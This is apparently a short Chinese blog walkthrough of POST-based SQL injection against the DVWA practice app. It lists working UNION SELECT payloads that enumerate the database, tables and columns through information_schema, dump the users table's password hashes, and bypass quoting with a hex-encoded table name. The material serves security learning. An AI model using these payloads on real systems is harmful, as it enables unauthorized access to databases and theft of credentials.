zoukankan      html  css  js  c++  java
  • sql_post注入

    1、使用order by 测试字段数,为2

    2、union select 1,2#找显位点

     3、找数据库名union select 1,database()#  为dvwa

     4、找表名,union select 1,table_name from information_schema.tables where table_schema=database()#

     得出:admin、guestbook、users

     5、找表中所有的字段

    1' union select 1, group_concat(column_name) from information_schema.columns where table_name='users'#

    得出其中一个为password字段

    6、显示password字段的 数值

    union select 1,password from users#

     7、去MD5,得出密码为password

    二、使用抓包工具修改传参,在参数后面添加and 1=1 没报错

     2、使用order by测试字段为2

     3、找数据库名字,得出为dvwa

     4、获取所有的表名

     5、获取表的字段,用十六进制进行绕过[0x7573657273]

    6、显示字段数据

     7、去解密密码为password

  • 相关阅读:
    实验四 主存空间的分配和回收
    学期总结
    实验三 进程调度模拟程序
    团队项目
    博客参考评论
    dos系统
    学习进度条
    了解和熟悉操作系统
    问题的思考和回答
    Python-关于脚本和冒泡算法
  • 原文地址:https://www.cnblogs.com/wenyoudo/p/13577059.html
Copyright © 2011-2022 走看看